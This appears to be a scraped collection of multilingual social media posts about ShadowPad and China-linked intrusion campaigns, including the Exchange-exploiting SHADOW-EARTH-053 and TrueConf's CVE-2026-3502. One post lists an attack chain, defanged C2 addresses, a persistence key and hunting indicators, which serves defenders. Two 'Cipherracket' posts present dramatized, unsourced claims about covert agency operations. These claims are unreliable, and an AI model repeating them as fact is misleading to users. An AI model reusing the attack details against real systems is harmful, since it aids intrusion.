Added some more indicators for: XWorm ( 2), MooBot ( 1), DarkComet ( 1), NetSupportManager RAT ( 1), Nanocore RAT ( 1), SectopRAT ( 2) and ShadowPad ( 1). vuldb.com/actor #apt #cti #ioc

The scale is staggering: state-sponsored hackers aren't just going after government secrets anymore — they're systematically mapping and infiltrating the industrial systems that keep our lights on, our water flowing, and our factories running. APT41 and multiple Chinese threat groups have been leading what can only be described as a comprehensive assault on global critical infrastructure throughout 2022. We're talking about sophisticated attacks targeting the operational technology that controls manufacturing, energy grids, and utility systems worldwide. What makes this particularly alarming is the technical sophistication. Kaspersky's ICS CERT documented these groups deploying ShadowPad malware specifically designed to compromise industrial control systems. This isn't your typical data theft operation — they're going after the systems that physically control infrastructure operations. But China isn't operating in a vacuum here. Russian actors have been getting creative with their operational models, outsourcing cyber-espionage activities to criminal groups — particularly for operations against Ukraine — while keeping direct state control over their most strategic targets. It's a hybrid approach that gives them both capability and deniability. Meanwhile, Chinese state actors have been executing massive espionage campaigns against healthcare companies and medical research institutions. The focus appears to be intellectual property theft, medical data collection, and compromising research infrastructure across multiple countries. Think about the implications: state actors systematically harvesting medical research and patient data on a global scale. Perhaps most concerning is the systematic reconnaissance effort intelligence agencies are tracking. State actors are methodically mapping critical infrastructure networks, identifying vulnerabilities, and establishing persistent access for what appears to be future operations. This spans telecommunications, energy, and transportation sectors across North America, Europe, and Asia. The Iranians have adopted their own twist on hybrid operations. They're increasingly using criminal ransomware groups — including DragonForce and Handala — as proxies for cyberattacks. It's a model that complicates attribution and response efforts while giving Tehran plausible deniability. This represents a fundamental shift in state-sponsored cyber operations. We're seeing a convergence of traditional espionage, criminal tactics, and infrastructure targeting that creates multiple layers of threat across both digital and physical domains. The operational security implications are massive. When state actors establish persistent access to industrial control systems, they're not just stealing data — they're positioning themselves to potentially disrupt or destroy critical infrastructure during a crisis or conflict. What's particularly troubling is how these campaigns demonstrate sustained, coordinated efforts rather than opportunistic attacks. The systematic nature suggests long-term strategic planning and resource allocation at the state level for comprehensive infrastructure compromise capabilities. foreigninterference.org/post… #foreigninterference #AdvancedPersistentThreatOperations #CriticalInfrastructureMapping #IndustrialSabotage #HealthcareDataBreach #RansomwareCampaigns #ProxySupport

LAN内の非公開端末にもSOCKS5プロキシで到達できるLinux向けマルウェア「Showboat」が報告されています。中東の通信事業者を少なくとも2022年半ばから標的にしてきたとされるモジュラー型の侵入後フレームワークで、リモートシェルの起動、ファイル送受信、プロセス一覧からの自身の隠蔽などの機能を備えています。 C2（遠隔操作）サーバーのIP位置情報が中国・四川省成都を示すと報告されており、PlugXやShadowPadと同様に複数の中国系グループが利用した可能性が指摘されています。 複数の中国系グループとの関連が指摘されるフレームワークが、通信事業者のLinux環境で少なくとも2022年半ばから活動を続けていた事例で、外部に露出していない端末への横展開手段を内蔵している点が特徴的です。 【要点の整理】 ・侵入済み端末を足場にSOCKS5プロキシ経由でLAN上の他端末へ接続し、外部から直接到達できない端末への横移動を担う構成。侵害済みシステムへの足場構築が主目的と見られている ・C2との通信では、収集したシステム情報を暗号化しBase64エンコードした文字列をPNG画像のフィールドに格納して送信する。プロセス隠蔽やC2管理の機能も搭載 ・隠蔽手段としてテキスト共有サービスPastebinにホストされたコードを取得して使用。該当の投稿は2022年1月に作成されたもの ・被害はアフガニスタンのISPやアゼルバイジャンの組織にも及び、類似のデジタル証明書（X.509）を持つ別のC2クラスタからは米国2件、ウクライナ1件の侵害の可能性も報告されている ・VirusTotalに2025年5月アップロードされたLinux実行形式（ELF）のバイナリが調査の発端。Kasperskyは同検体を「EvaRAT」の名称で追跡中 詳細は以下を参照： thehackernews.com/2026/05/sh…

SHADOW-EARTH-053 is exploiting legacy Microsoft Exchange infrastructure to target governments and critical infrastructure across Asia with ShadowPad malware and credential theft. blog.polyswarm.io/shadow-ear… #CyberSecurity #ThreatIntelligence #APT #ThreatHunting #PolySwarm

May 12, 2026, the global intelligence "Hardware" has shifted into a high-velocity Extraction and Containment phase. The "Loud Noise" is the public rhetoric of counter-terrorism and border security, but the "Hidden Code" reveals a massive, synchronized effort by the "National Houses" of the U.S. and Israel to "Cremate" the asymmetric advantages of Iran and China. Here is the "Cipherracket" decode of the operations currently live in the field. The Israeli Nodes: Mossad & Shin Bet - The "Loud Noise" is about #Gaza reconstruction and air strikes; the "Hidden Signal" is the Decapitation of the Shadow Ledger. - Mossad (The Scalpel): Mossad is focused on the "Classified Scientific Extraction." Following the news of Iran executing an aerospace engineer for allegedly collaborating with #Mossad, the agency has moved into a "Blackout" phase to protect remaining human assets in Tehran’s satellite and missile programs. They are currently "Packet Sniffing" the Iranian "Shadow Fleet" to identify the next shipment of Chinese dual-use tech. - Shin Bet (The Internal Shield): Working in a "Subterranean Handshake" with the #IDF, Shin Bet is currently auditing the "Gaza Production Array." Their focus is the physical destruction of weapons factories in northern Gaza, using "Neural Triage" to identify command nodes hidden within civilian infrastructure. The U.S. External Nodes: CIA, DIA, & NSA - The 2026 Threat Assessment released by DNI Gabbard signals a shift toward "Technological Sovereignty." - CIA (The Global Operator): The #CIA is currently executing "Operation Epic Fury" Support. Behind the curtains, they are monitoring the "Confederation of Independence" in #Africa to prevent #Russia from filling the vacuum left by shifting U.S. priorities. Their primary task is the "Symmetric Search" for Iranian nuclear precursors. - NSA (The Digital Fence): The #NSA is in a state of "High-Tempo Defense" against China’s "ShadowPad" implants. They are currently "Net-Fishing" for Chinese fake accounts used to steal AI secrets. They have flagged #China as the "most persistent cyber threat" to U.S. critical infrastructure. - DIA (The Military Eye): The #DIA is focused on the "Hormuz Hardware." They are providing real-time "Targeting Intelligence" to U.S. naval assets to ensure the Strait remains a "Ghost Node" for Iranian aggression. They are monitoring the 16,000-missile threat projected from the "Axis" of Russia, China, and #Iran. The U.S. Domestic Nodes: FBI & ATF - The domestic "Hardware" is being restructured under the 2026 Counterterrorism Strategy. - FBI (The System Auditor): The Bureau has "Surged Personnel" for Operation Not Forgotten 2026. While the "Loud Noise" is about violent crime in Indian Country, the "Hidden Code" is the hunt for "Jihadist Sympathizers" and "Violent Left-Wing Extremists" who have adopted "Ideologies Antithetical to the Republic." They are executing a "Hard-Wipe" of narcoterrorist logistical sinews. - ATF (The Kinetic Regulator): The #ATF is currently focused on "FTO Desegregation." They are working to "strangle the commercial and logistical sinews" of cartels, treating them as Foreign Terrorist Organizations (FTOs). Their mission is the interception of "precursor chemicals" and "dual-use drones" entering the "National House." The "Agency Triage" Matrix (May 2026) - Agency: Mossad - The "Loud" Noise (Mask): "Intelligence Crackdown." - The "Hidden" 85% Solution: The Signal: Protecting the "Satellite & Missile Data" extraction network. - Agency: NSA - The "Loud" Noise (Mask): "Cybersecurity Awareness." - The "Hidden" 85% Solution: The Handshake: "Offensive Cyber" against Chinese AI theft rings. - Agency: FBI - The "Loud" Noise (Mask): "Cold Case Initiatives." - The "Hidden" 85% Solution: The Triage: "Ideological Cleansing" of domestic terror nodes (Cartels/Jihadists). - Agency: Shin Bet - The "Loud" Noise (Mask): "Strike on Gaza factory." - The "Hidden" 85% Solution: The Result: "Mechanical Neutralization" of PIJ production arrays. - Agency: CIA/DIA - The "Loud" Noise (Mask): "Global Stability." - The "Hidden" 85% Solution: The Extraction: Monitoring "Chinese Shoulder-Fired Missiles" sent to #Tehran. The "Math" of Tonight: The "Immunity-to-Invasion" Ratio - The "Hidden Math" being calculated at Langley and Tel Aviv is the "Sanctuary Decay." - The Calculation: To maximize a facility's safety, an organization must increase its reliance on secure, old-school offline methods while completely cutting out the digital signals and wireless emissions that high-tech tracking systems use to locate them. - The Result: The agencies have realized that the "Global Cloud" is compromised. They are moving their most sensitive "Hardware" back to "Sovereign Soil" and using "Automated Audits" to identify anyone whose "Digital Footprint" suggests a "Subterranean Handshake" with the enemy. The Advice for Your Physical House - The agencies are currently "Packet Sniffing" for any "Ideological Malware." - Digital Hygiene: Assume the NSA and FBI have "Admin Keys" to any public cloud. Use "Analog Sanctuaries" for your most critical neighborhood compacts. - Resource Triage: As the ATF strangles cartel logistics, expect "Friction" in the "Ghost Nodes" of gray-market imports. - Neural Buffer: Do not let the "Loud Noise" of the 16,000-missile threat "Cremate" your local focus. - The satellites are watching Lop Nur, the FBI is surging in the heartland, and the "Baphomet" of global espionage is being unmasked. Disclaimer - Cipherracket decoding combines pattern analysis, language analysis, systems thinking, and network mapping to identify signals that may deserve further investigation. #WelcometotheCipherracket #Cipherracket

Wednesday night, May 6, 2026, the spying apparatuses of the "Axis of Resistance" (Russia, China, and Iran) have evolved from simple intelligence gathering into "High-Velocity Hybrid Warfare." They are no longer just looking for secrets; they are looking for the "Mechanical Exploits" to break the Western "National House" from within. Here is the "Cipherracket" decode of the tri-node espionage landscape. 1. Russia (SVR, FSB, GRU): The "Confederation of Independence" - Russia’s intelligence services have shifted their focus toward "Global Displacement." They are moving their "Hardware" (agents and Wagner successors) into regions where the U.S. is withdrawing. - The "Company" Campaign: The SVR (Foreign Intelligence) is currently running a massive $8.6M operation through a front known as "The Company." Their goal is to build a "Confederation of Independence," a belt of pro-Russian regimes in #Africa and Latin America. - The "Buffer Zone" Code: The GRU (Military Intelligence) is executing "Neural Triage" in Europe, using fake nuclear rhetoric to drive a wedge between the U.S. and the EU. They are planting the "Software" of fear to prevent the EU from developing independent defense capabilities. - The "Hormuz Handshake": Russia is providing #Iran with real-time "Targeting Intelligence" on U.S. military positions in the Gulf to help them bypass naval intercepts during "Project Freedom." 2. China (MSS): The "N-Day" Extraction - China’s Ministry of State Security (MSS) has moved into a "Predatory Extraction" phase, focusing on the theft of "Infrastructure Software" and "Biologic Hardware." - The "Shadow-Earth" Cluster: A new campaign (SHADOW-EARTH-053) was disclosed this week. It targets unpatched Microsoft Exchange servers in #Poland and Southeast Asia to stage "ShadowPad" implants. They are "Packet Sniffing" the internal communications of #NATO states in real-time. - Transnational Repression: The MSS is using "Phishing Agents" (GLITTER CARP) to impersonate journalists and activists, targeting the Uyghur and Hong Kong diaspora. This is the "Digital Fence," ensuring that the "National House" of #China controls its subjects even when they are in the "Analog Sanctuary" of the West. - The "Teapot" Loophole: The MSS is coordinating "Shadow Fleets" of oil tankers to bypass U.S. sanctions on Iran, using "Private Artisans" (small refineries) as the "Ghost Nodes" to fund the Iran war effort. 3. Iran (MOIS & IRGC): The "Mosaic Defense" - Despite the ongoing "Operation Epic Fury" (the U.S./#Israel strikes on Iran), Iran’s spying agencies have decentralized into a "Mosaic Doctrine." - The "Stryker" Strike: The MOIS (Ministry of Intelligence) recently executed a high-end cyber-attack designed for "Psychological Exhaustion." They are targeting U.S. civilian infrastructure (water, power) to "Bring the War Home" to the American "Neighborhood Network." - Decentralized Proxies: Because their main command centers have been struck, the #IRGC has delegated authority to "Pre-positioned Proxy Ecosystems." These are "Ghost Agents" living in the West who are waiting for a "Symmetric Signal" to activate sabotage operations. - The "BadeSaba" Exploit: They are weaponizing popular religious apps (like the BadeSaba prayer app) to track and message millions of users, turning a "Spiritual Software" into a "Mobilization Hardware." The "Axis of Espionage" Triage Matrix (May 2026) - Agency: #Russia (SVR) - The "Loud" Noise (Mask): "Anti-Colonialism in Africa." - The "Hidden" Structural Truth: The Signal: Displacement of U.S./#French mining and military nodes. - Agency: China (MSS) - The "Loud" Noise (Mask): "Standard business outreach." - The "Hidden" Structural Truth: The Result: The "ShadowPad" penetration of NATO defense servers. - Agency: Iran (IRGC) - The "Loud" Noise (Mask): "Defending the homeland." - The "Hidden" Structural Truth: The Triage: "Psychological Sabotage" of U.S. civilian infrastructure. - Agency: The "Axis" - The "Loud" Noise (Mask): "Sovereign nations' rights." - The "Hidden" Structural Truth: The Handshake: Russia and China using the Iran war to "Reverse Engineer" U.S. weaponry. The "Math" of 2026 Spying: The "Insight-to-Munition" Ratio - The "Hidden Math" of today is the Observational Profit China and Russia are gaining from the Iran war. - The Calculation: Measures the intelligence value Iran gains by using cheap, disposable drones to force the United States to reveal its high-tech weaponry and defensive tactics. - The Result: China and Russia are getting a "Free Look" at U.S. AI-assisted precision strikes. They are "Packet Sniffing" the strengths and weaknesses of U.S. hardware (like the Patriot and Tomahawk) without firing a single shot of their own. The Advice for Your Physical House - The "help" is in the "Zero-Trust" Protocol. - Hardware Hygiene: If you are in a "Neighborhood Network" near a military or infrastructure node, assume your router is a "SOHO Target" for the GRU or MSS. Update your firmware tonight. - Neural Buffer: Do not let the "Iran War Headlines" exhaust your political will. That is the MOIS "Software" Goal. - Analog Sanctuary: As China ramps up "Transnational Repression," keep your most sensitive associations and "Codes" offline. The "Digital House" is no longer a private space. - The "Ghost Nodes" of the MSS are in your servers, and the SVR is building a new world in Africa. Sources - odessa-journal.com - Institute for the Study of War - thehackernews.com - The Soufan Center - Anadolu Ajansi Disclaimer - Cipherracket decoding combines pattern analysis, language analysis, systems thinking, and network mapping to identify signals that may deserve further investigation. @Antiwarcom @scotthortonshow @DecampDave @DA_Stockman @Judgenap @TuckerCarlson @RealAlexJones @RealCandaceO @MearsheimerJ #WelcometotheCipherracket #Cipherracket

#ThreatProtection A China-aligned cluster is deploying #ShadowPad via signed binaries and DLL sideloading to infiltrate Asian government networks, read more: broadcom.com/support/securit…

未修正のExchange脆弱性が長期間悪用されていた。中国系とみられる攻撃集団が政府や防衛関連組織に侵入し、メール窃取や情報収集を行うサイバー諜報活動が明らかになった。 MicrosoftのExchange Serverの既知脆弱性を悪用し、SHADOW-EARTH-053と呼ばれる攻撃グループが活動していた。対象はアジアを中心に少なくとも8カ国に及び、防衛関連企業や政府機関、IT企業、交通分野などが侵害された。欧州ではポーランドも標的に含まれていた。 侵入にはProxyLogonとして知られるCVE-2021-26855やCVE-2021-27065など複数の脆弱性が利用され、未更新環境が狙われた。侵入後はExchange管理機能を悪用してメールボックスを列挙し、独自ツールでデータを外部に持ち出していた。 マルウェアにはShadowPadが使用され、DLLサイドロード技術で正規署名アプリを装って展開された。ペイロードはレジストリから読み込まれ、実行後に痕跡を消すなど隠蔽も行われた。 古い脆弱性であっても未対策環境では依然として有効な侵入口となっており、継続的なパッチ適用と監視の重要性が改めて示された。 cybersecuritynews.com/china-…

New state-aligned intrusion set SHADOW-EARTH-053 exploits ProxyLogon vunlerabilities in unpatched Exchange servers to deploy GODZILLA web shells and Shadowpad via DLL sideloading. Government targets across 8 countries. Read more: research.trendmicro.com/3QFH…

🕵️ Azja i 🇵🇱 Polska (?!) na celowniku Chin? Było o Korei Północnej to dzisiaj wyżej na północ. Chińsko powiązana kampania SHADOW-EARTH-053 pokazuje, że w cyberszpiegostwie nadal działa bardzo prosty scenariusz: publiczny serwer, znana podatność i brak aktualizacji. Według raporut Trend Micro, który ukazał się 30 kwietnia - większość celów znajdowała się w Azji, głównie w sektorze rządowym i obronnym, ale w raporcie pojawia się też Polska jako europejski kraj NATO w zasięgu opisanej aktywności. To ważne zastrzeżenie, bo badacze nie opisują jednej prostej operacji, tylko nakładające się działania dwóch klastrów: "053" i "054". W części środowisk wcześniejsza kompromitacja przez "054" poprzedzała późniejsze wdrożenie ShadowPad przez "053". Atakujący wykorzystywali podatne serwery Microsoft Exchange, IIS i aplikacje webowe. Po wejściu instalowali web shelle, prowadzili rozpoznanie domeny, szukali kontrolerów domeny, enumerowali hosty i porty, a następnie wdrażali ShadowPad przez DLL side-loading. W części środowisk pojawił się także #NoodleRAT na Linuksie. Najciekawszy wątek dotyczy poczty. Trend Micro opisuje eksport skrzynek przez EWS API z użyciem narzędzia #ExchangeExport oraz tworzenie zabezpieczonych hasłem archiwów #RAR z wiadomościami. W jednym przypadku chodziło o plik PST osoby z kierownictwa. To pokazuje, że celem nie była przypadkowa obecność w sieci, tylko dostęp do konkretnych informacji. W praktyce to kolejny argument za tym, że exposure management nie kończy się na samym skanie podatności. Znane CVE na systemach brzegowych, niepilnowane katalogi webowe, nietypowe procesy uruchamiane przez serwer IIS i ruch wychodzący z serwerów aplikacyjnych to sygnały, które trzeba łączyć w jeden obraz ryzyka. Źródła: Trend Micro, The Hacker News Źródło grafiki: Trend Micro

China-linked SHADOW-EARTH-053 hackers target governments, NATO, journalists, and activists across Asia and Poland using web shells, ShadowPad implants, and phishing campaigns GLITTER CARP and SEQUIN CARP. #SHADOWEARTH #China #Poland ift.tt/DP6iGWH

Pakistan Thailand Malaysia India Myanmar Sri Lanka Taiwan #ShadowPad Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia trendmicro.com/en_us/researc…

“新中国成立70多年来，中国从未挑起过一场战争，从未侵占过一寸外国土地，坚定走和平发展道路。” 然而却在网络，电信，商业，科技，医疗，教育等等方面却在全方位的入侵世界各国！ “一个与中国有关联的新型威胁组织从 2024 年 12 月开始渗透到波兰、亚洲国家以及可能更远地区的十几个关键网络中，其活动甚至在本月仍有发现。 TrendAI的研究人员在一份独家提供给The Register的报告中指出，他们追踪到的这个名为Shadow-Earth-053的新组织，其目标包括政府机构、国防承包商、科技公司和交通运输行业。这些中国间谍通常通过存在漏洞的微软Exchange服务器获取对受害者环境的初始访问权限。 在多次入侵中，他们在部署ShadowPad （中国 APT41使用的定制后门程序，已使用近十年，并自 2019 年以来在多个与中国结盟的组织之间共享）之前，长达 8 个月的时间就已攻破了受害组织。 约有一半的受害者也遭到了关联组织 Shadow-Earth-054 的攻击，该组织利用了相同的漏洞，并与 Shadow-Earth-053 共享了相同的工具哈希值和重叠的技术。054 组织与Palo Alto Networks Unit 42追踪的CL-STA-0049 、Elastic Security Labs 追踪的REF7707以及Earth Alux等中国黑客组织存在一些网络重叠。 TrendAI 负责人工智能安全和威胁研究的副总裁 Tom Kellermann 将这些新的中国组织比作Salt Typhoon和Volt Typhoon。 Salt黑客组织早在2019年就开始入侵电信和政府机构，以隐蔽的方式长期入侵受害组织。Volt黑客组织则在2021年中期效仿，深入美国关键网络，为未来发动破坏性攻击做好准备。这两起黑客行动直到2023年末才被曝光。

⚠️ China-linked hackers targeted governments across Asia a NATO state (Poland), exploiting Exchange/IIS flaws to deploy ShadowPad. At the same time: journalists & activists hit with phishing campaigns. Two ops. Same priorities. Details here → thehackernews.com/2026/05/ch…

Chinese state-sponsored cyber operations use industrialized networks of compromised SOHO routers, IoT devices, and edge appliances for stealthy reconnaissance, C2, and data exfiltration via local exit nodes. #China #CovertNetworks #ShadowPad ift.tt/7TGCuse

A or A malware is exceptionally rare. Also, the A or A category kind of depends on the timeline. For example, A malware from the 90's may not be A malware in 2026. Regardless, here is some malware I consider A or A - ZMist - Stuxnet - Operation Triangulation - BlackEnergy 3 - Pegasus Spyware (not PegasusRAT) - SUNBURST - Linux/Kobalos - GrayFish - Drovorub - ShadowPad ... There is more, but this is off the top of my head. There is a lot of malware that truly blew my mind.

ビデオ会議ソフトTrueConfの脆弱性が中国系ハッカーに悪用され、米政府が緊急対応に踏み切った。正規アップデート機能を乗っ取る手口でマルウェアが配布され、政府機関を中心にスパイ活動に利用されている可能性が浮上している。 問題のCVE-2026-3502はTrueConfに存在する脆弱性で、更新機構の検証不備を突かれることで、攻撃者が任意のファイルを配布・実行できる。CISAはこの欠陥を既知悪用脆弱性として扱い、連邦機関に対し4月16日までの修正適用を命じた。Check Pointの調査では、この脆弱性は「TrueChaos」と呼ばれる攻撃キャンペーンで利用され、東南アジアの政府機関が標的となった。攻撃ではまずリンク経由でTrueConfクライアントを起動させ、更新通知を表示させる。その裏でオンプレミスサーバー上の更新パッケージがすでに改ざんされており、利用者は正規の更新処理を通じて不正ファイルを取得してしまう仕組みである。さらにHavocツールやShadowPadなど、中国系攻撃で特徴的な手法やマルウェアも確認された。TrueConfは世界10万組織で利用されており、政府や重要インフラへの影響が懸念されている。 securityaffairs.com/190330/h…

Active zero-day exploitation: Chinese 🇨🇳-nexus threat actors weaponize TrueConf video conferencing update mechanism to deploy Havoc payloads against Southeast Asian government networks. CVE-2026-3502 (CVSS 7.8) exploited in Operation TrueChaos campaign. Technical breakdown: • CVE-2026-3502: TrueConf client lacks integrity validation in update process, allowing arbitrary code execution via compromised on-premises server • Attack chain: Malicious trueconf_windows_update.exe → drops poweriso.exe 7z-x64.dll → DLL sideloading → UAC bypass via iscsicpl.exe hijacking iscsiexe.dll • C2 infrastructure on Alibaba/Tencent cloud (43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197) serving Havoc framework • Persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck registry key • Overlapping ShadowPad activity suggests coordinated Chinese APT operations Hunt for unsigned trueconf_windows_update.exe, poweriso.exe in C:\ProgramData\PowerISO\, and process chain trueconf.exe → trueconf_windows_update.exe spawning cmd.exe with curl/winrar commands. #DFIR_Radar

綺麗にできました。 🧸「BUGるBEAR - ShadowPad -」 Thailand Toy Expo 2026で販売します。 turn_UP_toys ブースに持っていく特別なアイテムのひとつです。 深みのあるトーンに、 鮮やかなネオンピンク、 見る角度で印象が変わる偏光感のある彩色を重ねました。 【📌 イベント情報】 Thailand Toy Expo 2026 📅 2026年4月2日〜5日 📍 CentralWorld Brand: turn_UP_toys Zone: Square Booth No.: F-39 日本からバンコクに来る方居ますか？

Earth Lusca, a China-linked threat actor since 2019, targets government, media, telecom, academia, and crypto platforms using advanced tools like KTLVdoor and ShadowPad with cloud-based rotating C2 infrastructure. #China #EarthLusca #KTLVdoor ift.tt/IeazlYU